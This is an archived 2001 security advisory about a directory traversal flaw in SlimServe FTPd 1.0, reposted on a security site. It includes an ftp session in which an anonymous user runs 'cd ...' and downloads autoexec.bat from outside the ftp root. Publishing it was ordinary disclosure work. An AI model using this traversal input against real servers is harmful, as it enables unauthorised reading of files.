Search (keywords):  SOFT ARTICLES TIPS & TRICKS SECURITY LINKS NEWS MAN DOCUMENTATION

<< Previous INDEX Search src Set bookmark Go to bookmark Next >>

Date: Wed, 28 Feb 2001 18:35:23 -0500
From: [email protected]
To: [email protected]
Subject: Vulnerability in SlimServe FTPd

--Hushpart_boundary_sVGbIsqMrgDNsxTmWgXLwFSGfzOUIeAc
Content-type: text/plain

----- Begin Hush Signed Message from [email protected] -----

Vulnerability in SlimServe FTPd



    Overview

SlimServe FTPd v1.0 is an ftp server available from
http://www.whitsoftdev.com and http://www.download.com.  A vulnerability
exists which allows an attacker to break out of the ftp root using
relative paths (ie: '...').



    Details

The following is an illustration of the problem.  An ftp root of
"c:\directory\directory" was used.

% ftp localhost
Connected to xxxxxxxxxx.rh.rit.edu.
220-SlimServe FTPd 1.0 :: www.whitsoftdev.com.
220 127.0.0.1 connected to xxxxxxxxxx.rh.rit.edu.
User (xxxxxxxxxx.rh.rit.edu:(none)): anonymous
230 User anonymous logged in, proceed.
ftp> cd ...
250 CWD command successful.
ftp> get autoexec.bat
200 PORT command successful.
150 Opening data connection for "/.../autoexec.bat".
250 RETR command successful.
ftp: 383 bytes received in 0.16Seconds 2.39Kbytes/sec.
ftp>





    Solution

No quick fix is possible.



    Vendor Status

WhitSoft Development was contacted via <[email protected]> on
Tuesday, February 20, 2001.  No reply was received.



    - Joe Testa  ( e-mail: [email protected] / AIM: LordSpankatron )


----- Begin Hush Signature v1.3 -----
BdKXWOXtYQqLBhT0XXyjq8msVo/YPcLXDI/inYF7lTcYeYbHERn9vjPhP0RMD5HnALmF
aUXa8uek5Zpm2ZUukmAqMH03zA997x1MYtzHqvdpyU/7XfZIDynkrEoAp+beYPx72IED
Xxve3ecqaTmG3BdenblWF9UrjkXcpIRNPi3PoAG91Ql3NikjXeVh+pUlogh3MDJ1XO1O
/Z5tFkbqsqKIe6f5ezRD7oxtecFxOEtjMNYQuQTFEaUJBF3x7ydAxYvMLn1Xi+332cJ/
+lC/ra1vkow1kaCCTigBxTgdcueMgfduO0zqd2bFNdyWK8llHT/LFqDGPL3+zkex/U/e
Sd9wEtkqBQuutyL/M9ZxY/r7XIrWdwm4VG+AKKEhsRCzenLgUaiJMGjp+8SnZ/+jf3bD
ga/OkZztzza0pOBimOdlfRSWqSQX2iE77gpExvdo/4y5ZK+VSGx1zQ1q4k2yESNruhRH
owvo0nu7h/9qW2/D+jnLgnz1j7D972sxrDJWwe+JZHof
----- End Hush Signature v1.3 -----


This message has been signed with a Hush Digital Signature.
To verify the signature, please go to www.hush.com/tools


Free, encrypted, secure Web-based email at www.hushmail.com
--Hushpart_boundary_sVGbIsqMrgDNsxTmWgXLwFSGfzOUIeAc--


IMPORTANT NOTICE:  If you are not using HushMail, this message could have been read easily by the many people who have access to your open personal email messages.
Get your FREE, totally secure email address at http://www.hushmail.com.

<< Previous INDEX Search src Set bookmark Go to bookmark Next >>

Партнёры:

Хостинг: